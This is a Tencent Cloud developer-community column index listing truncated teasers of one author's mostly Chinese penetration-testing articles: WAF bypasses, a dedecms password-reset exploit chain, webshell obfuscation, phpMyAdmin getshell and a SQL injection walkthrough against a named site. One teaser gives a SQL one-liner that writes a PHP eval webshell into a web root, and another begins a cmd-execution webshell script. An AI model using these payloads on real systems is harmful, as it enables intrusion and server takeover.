腾讯云
开发者社区
文档
建议反馈
控制台
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
登录/注册
首页
学习
活动
专区
工具
TVP
最新优惠活动
返回腾讯云官网
小白安全
菜鸟安全
专栏作者
举报
126
文章
245297
阅读量
55
订阅数
订阅专栏
申请加入专栏
全部文章
其他
php
安全
安全漏洞
html
数据库
shell
linux
windows
css
云数据库 SQL Server
java
python
sql
存储
asp
https
javascript
apache
自动化
网络安全
ssh
tcp/ip
flash
powershell
比特币
数字货币
ruby
go
bash
xml
ajax
access
api
unix
windows server
容器镜像服务
腾讯云测试服务
mongodb
人工智能
网站
微信小程序音视频
http
容器
编程算法
游戏
开源
分布式
缓存
黑客
爬虫
jdk
wordpress
dns
seo
自动化测试
selenium
iis
kerberos
数据库管理
服务器
远程桌面
搜索文章
搜索
搜索
关闭
重置dedecms管理员后台密码重现及分析
安全
php
sql
人工智能
0×00 概述 2018年1月,网上爆出dedecms v5.7 sp2的前台任意用户密码重置和前台任意用户登录漏洞,加上一个管理员前台可修改其后台密码的安全问题,形成漏洞利用链,这招组合拳可以重置管理员后台密码。 先来看看整体利用流程: 重置admin前台密码—>用admin登录前台—>重置admin前后台密码 0×01 前台任意用户密码重置分析 组合拳第一式:重置管理员前台密码 漏洞文件:member\resetpassword.php:75 else if(
奶糖味的代言
2018-04-16
6.4K
0
EMLOG博客系统插件挂载点及说明
php
css
挂载点:doAction('adm_main_top') 所在文件:admin/views/default/header.php 描述:后台红线区域扩展 挂载点:doAction('adm_head') 所在文件:admin/views/default/header.php 描述:后台头部扩展:可以用于增加后台css样式、加载js等 挂载点:doAction('adm_siderbar_ext') 所在文件:admin/views/default/header.php 描
奶糖味的代言
2018-04-16
1.1K
0
渗透测试SHELL语句参考
shell
php
SQL注入一句话: select '<? php eval($_POST[xiaobai]);?>' into outfile 'd:/wwwroot/1.php'; Linux清除访问日志一句话
奶糖味的代言
2018-04-16
568
0
过安全狗waf注入技巧
安全
php
过安全狗waf注入 前提web页面存在注入漏洞 测试开始本地搭建环境 环境 安全狗(APACE版)V4.0 防护规则全开 绕过 1. 延时盲注 http
奶糖味的代言
2018-04-16
796
0
关于YUNUCMSv1.0.6 任意文件删除与配置文件写shell-freebuf漏斗社区发布
shell
php
安全
windows
任意文件删除漏洞 0×00 相关环境 源码信息:YUNUCMSv1.0.6 问题文件: \YUNUCMSv1.0.6\statics\ueditor\php\vendor\Local.class.php 漏洞类型:任意文件删除漏洞 站点地址:http://www.yunucms.com/ 0×01 漏洞分析 在文件\YUNUCMSv1.0.6\statics\ueditor\php\vendor\Local.class.php的第3
奶糖味的代言
2018-04-16
1.1K
0
SQLMAP命令中文注释
数据库管理
https
php
shell
windows
sqlmap常用命令大全 sqlmap -u “http://url/news?id=1″ –current-user #获取当前用户名称sqlmap -u “http://www.xxoo.c
奶糖味的代言
2018-04-16
2K
0
搭建xss跨站脚本攻击平台教程
php
数据库
sql
这篇文章打算很久以前就发了但是总是忘记刚刚看了一下i春秋 源码下载:链接:http://pan.baidu.com/s/1gfdUYiB 密码:efp1 下载之后解压源码,放到网站目录,然后修改配置文件:config.php 将根目录下的数据库文件(xssplatform.sql)导入到mysql数据库中 不过导入的时候出了点问题: 源文件里的数据库文件没有“`pvicnikh_xss`”这个数据库: 然后导致导入.sql文件的时候出错了,mmp 解决办
奶糖味的代言
2018-04-16
1.6K
0
emlog博客系统去除分类sort优化SEO
seo
php
分类URL网址中有个sort字样只会在开启伪静态后才显示 想去除EMLOG伪静态分类网址中的sort, include文件夹下,在lib文件夹下找到dispatcher.php和url.php这两个文件使用编辑器打开, 具体看一下内容: 一、使用编辑器打开url.php文件 找到 $sortUrl = BLOG_URL . 'sort/' . $sort_index; 改成 $sortUrl = BLOG_URL. $sort_index; 找到 $sortUrl = BLOG_URL . '
奶糖味的代言
2018-04-16
662
0
当webshell不可执行cmshell时 【菜刀的安全模式】可用此脚本突破执行cmd命令
php
<?php /* ============== */ error_reporting(0); ini_set('max_execution_time',0); // -------------
奶糖味的代言
2018-04-16
1.5K
0
FreeBuf发布某CMS注入分析及注入点总结
开源
数据库
php
sql
Bluecms是一个地方网站的开源的cms,在很多地方性的网站上应用还是不少的,今天在逛seebug的时候看到了一个漏洞的公告。 有公告但是这里还没有详情,很好奇我就去下载了一套源码看了看,好像
奶糖味的代言
2018-04-16
690
0
phpmyadmin新姿势getshell
php
shell
云数据库 SQL Server
windows
apache
在一个有WAF、并且mysql中的Into outfile禁用的情况下,我该如何getshell? 首先环境如下: OS:Windows 2003 WAF:Safe Dog 4.0正式版 phpmyadmin:4.7(许多都可以) Mysql:5.5+ PHP:5.3 Apache:2.x 目前 into outfile 已经被禁用,并且WAF也会在写入文件的时候拦截。 那么我们尝试通过一个脑洞大开的方法去getshell。 (必须是mysql root权限)
奶糖味的代言
2018-04-16
1.6K
0
web渗透思路及总结
数据库
iis
php
(一)针对网站程序,不考虑服务器。 一、查找注入,注意数据库用户权限和站库是否同服。 二、查找XSS,最近盲打很流行,不管怎样我们的目的是进入后台。 三、查找上传,一些能上传的页面,比如申请友链、会员头像、和一些敏感页面等等,注意查看验证方式是否能绕过,注意结合服务器的解析特性,比如典型的IIS6.0、阿帕奇等。 四、查找编辑器,比较典型的ewebeditor、fckeditor等等。 五、查找phpmyadmin等管理程序,可以尝试弱口令,或者寻找其漏洞。 六、百度、谷
奶糖味的代言
2018-04-16
2.4K
0
反射跨站脚本(XSS)示例
php
flash
go
网站
javascript
如何利用它? 原来的要求如下: 应用程序的回应非常清楚。用户ID为空(空)。我们没有为它指定一个值。 我们有XSS。有效负载未被应用程序编码/过滤,响应的内容类型显示为HTML: 获得
奶糖味的代言
2018-04-16
2.8K
0
MongoDB安全 – PHP注入检测
mongodb
数据库
php
什么是MongoDB MongoDB 是一个基于分布式文件存储的数据库。MongoDB是个开源的NoSql数据库,其通过类似于JSON格式的数据存储,这使得它的结构就变得非常自由。通过MongoDB的查询语句就可以查询具体内容。 为什么使用MongoDB 其实大部分原因只是因为MongoDB可以快速查找出结果,它大概可以达到10亿/秒。当然MongoDB很流行的另外一个原因是在很多应用场景下,关系型数据库是不适合的。例如,使用到非结构化,半自动化和多种状态的数据的应用,或者对数据可扩展性要求高的。
奶糖味的代言
2018-04-16
1.6K
0
SQL注入 上传绕过安全狗
php
一,绕过安全狗上传可执行脚本 附上php上传脚本源码,此源码未对上传文件类型做校验 <?php move_uploaded_file($_FILES["file"]["tmp_name
奶糖味的代言
2018-04-16
1.6K
0
绕过软WAF攻略
腾讯云测试服务
php
http
安全
现在软waf较为多,就在今年夏天苦逼挖洞的日子里经常遇到360主机卫士,安全狗,云锁之类的软waf进行拦截,经常碰到如下拦截提示: 看到以上三个拦截提示就让人头疼不已,欲罢不能。 数据库特
奶糖味的代言
2018-04-16
2.3K
0
小白博客 迷你音乐播放器及实现全站pjax无刷新加载
html
php
演示截图: 请点击此处输入图片描述 请点击此处输入图片描述 使用教程,下载播放器文件,直接上传压缩包至你的网站根目录,然后解压到根目录。 然后在你的网站程序模板文件或者html中
奶糖味的代言
2018-04-13
2.1K
0
小白博客 SQL注入实战
sql
安全
php
本文仅供学习交流,目的是为了构建更加安全的网络环境! 注入地址 某VIP会员专用系统http://www.tcmpv.com/index.php/Home/Public/login.html 相关工具 注入工具: 超级SQL注入工具【SSQLInjection】http://www.shack2.org/article/1417357815.html 明小子 抓包工具: Wireshark 注入过程 1.测试漏洞 1)测试 ' 首先打开网
奶糖味的代言
2018-04-12
1.4K
0
【PHP】WEBSHELL各类变形方法总结
php
shell
简介 WebShell的变形技术与各种防护软件的检测方法一直都在相互对抗,本篇文章就对目前常见的WebShell的变形技术进行总结。 目前的防护软件对能够执行命令函数和能够执行代码的函数都会格外的敏感,如eavl、assert、system、popen、shell_exec,所以像最为简单的eval($_POST[cmd])的一句话就一定会被查杀。所以目前的变形的本质都在于如何隐藏自己的敏感函数。 巧用$GPC 利用$GLOBALS @eval($GLOBA
奶糖味的代言
2018-04-12
2.3K
0
EMLOG更改后台地址导致微语表情不显示解决方法
php
解决办法: 在include/lib/function.base.php中找到一下代码 /** * 替换表情 * * @param $t */ function emoFormat($t){ $emos = array('[耶]'=>'0.gif', '[呵呵]'=>'1.gif', '[悲伤]'=>'2.gif', '[抓狂]'=>'3.gif', '[衰]'=>'4.gif', '[花心]'=>'5.gif', '[哼]'=>'6.gif', '[泪]'=>'7.gif', '[害羞]
奶糖味的代言
2018-04-12
641
0
点击加载更多
社区活动
腾讯技术创作狂欢月
“码”上创作 21 天,分 10000 元奖品池!
立即发文
Python精品学习库
代码在线跑,知识轻松学
立即查看
博客搬家 | 分享价值百万资源包
自行/邀约他人一键搬运博客,速成社区影响力并领取好礼
立即体验
技术创作特训营·精选知识专栏
往期视频·千货材料·成员作品 最新动态
立即查看
领券
问题归档
专栏文章
快讯文章归档
关键词归档
开发者手册归档
开发者手册 Section 归档